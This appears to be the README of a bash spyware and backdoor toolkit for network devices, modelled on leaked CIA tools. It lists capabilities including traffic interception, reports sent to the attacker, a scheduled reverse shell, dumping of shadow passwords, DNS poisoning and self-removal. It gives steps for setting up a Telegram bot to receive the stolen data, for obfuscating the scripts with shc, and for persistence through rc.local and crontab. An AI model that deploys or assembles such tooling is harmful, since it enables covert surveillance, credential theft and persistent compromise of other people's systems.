Inspired by the CIA's Top Secret projects revealed by Wikileaks:
- Project Elsa
- Project OutlawCountry
- Project Cherry Blossom
- Project Dumbo
Features | |
---|---|
Get public ip | ✔️ |
Find all devices | ✔️ |
Intercept all traffic | ✔️ |
Send report to attacker | ✔️ |
Get system info | ✔️ |
Self-removal | ✔️ |
Schedule Reverse shell | ✔️ |
Enable port forwarding | ✔️ |
Dump Shadow Passwords | ✔️ |
DNS poisoning | ✔️ |
Session control | ✔️ |
System encryption | ✔️ |
Deny connection | ✔️ |
Upload customized firmware | ❌ |
Session hijack | ❌ |
Script injection | ❌ |
Packet forger | ❌ |
Traffic manipulation | ❌ |
Clear System Log | ❌ |
OnionShare support | ❌ |
Secret admin HTML page | ❌ |
- Open
Telegram
> searchBotFather
> type/newbot
> set namename_bot
>get HTTP API token
- Search
RawDataBot
> ClickStart
> The Telegram bot will send a message with your account info. Scroll down and find chat. Yourchat ID
number is listed below, next to id
It is not possible to make a bash file completely undecipherable, since bash code is interpreted by the operating system so that it can be executed. However, it is possible to make the code more difficult to read or modify through what is known as "minification" or "obfuscation" of the code.
Run shc -f spy.sh & shc -f scan.sh
to encrypt and protect bash script
Using rc.local
- Digit
vi /etc/rc.local
> add the command to run the script inside the file before theexit 0
line > write/path/to/myscript.sh &
> dave and exit:qw
- Digit
chmod +x /etc/rc.local
> digitsystemctl enable rc-local.service
Using crontab
- Digit
chmod +x /path/to/scan.sh && chmod +x /path/to/spy.sh
>crontab -e
> write@reboot /path/to/scan.sh
or@reboot /path/to/spy.sh
I recommend using this scripts for testing, learning and fun :D